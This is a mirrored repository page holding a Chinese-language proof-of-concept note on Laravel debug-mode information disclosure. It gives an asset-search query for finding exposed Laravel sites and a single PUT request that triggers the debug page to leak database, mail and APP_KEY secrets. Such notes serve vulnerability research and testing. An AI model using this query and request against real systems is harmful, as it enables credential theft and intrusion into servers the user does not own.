admin/POC
1
0
Fork 0
mirror of https://github.com/eeeeeeeeee-code/POC.git synced 2025-05-28 09:10:33 +00:00
Code Issues Packages Projects Releases Wiki Activity
POC/wpoc/laravel/laravel开启debug模式信息泄露漏洞.md
eeeeeeeeee-code 06c8413e64 first commit
2025-03-04 23:12:57 +08:00

1.4 KiB
Raw Blame History

laravel开启debug模式信息泄露漏洞

一、漏洞简介

laravel因配置不当会泄露MySQLRedisElasticMongodbneo4jpostgresqlSQLServerOracleFirebirdsqlitemail账号密码和APP_KEY等敏感信息。黑客可以利用这些信息进行脱库或者在服务器植入后门也可以利用数据库服务器进行跳板入侵内网其他重要服务器。

二、影响版本

  • laravel

三、资产测绘

  • hunterapp.name=="Laravel Default Page"
  • 特征

1706028497800-b50dcfba-e08c-49ee-889a-d5366a7c5da2.png

四、漏洞复现

PUT /index.php HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Accept-Encoding: gzip, deflate
Content-Length: 0

1706028548504-9391ce93-a3e2-469c-b68a-430122c7597f.png

更新: 2024-02-29 23:57:33
原文: https://www.yuque.com/xiaokp7/ocvun2/tgvd9mmhbtzgbv2k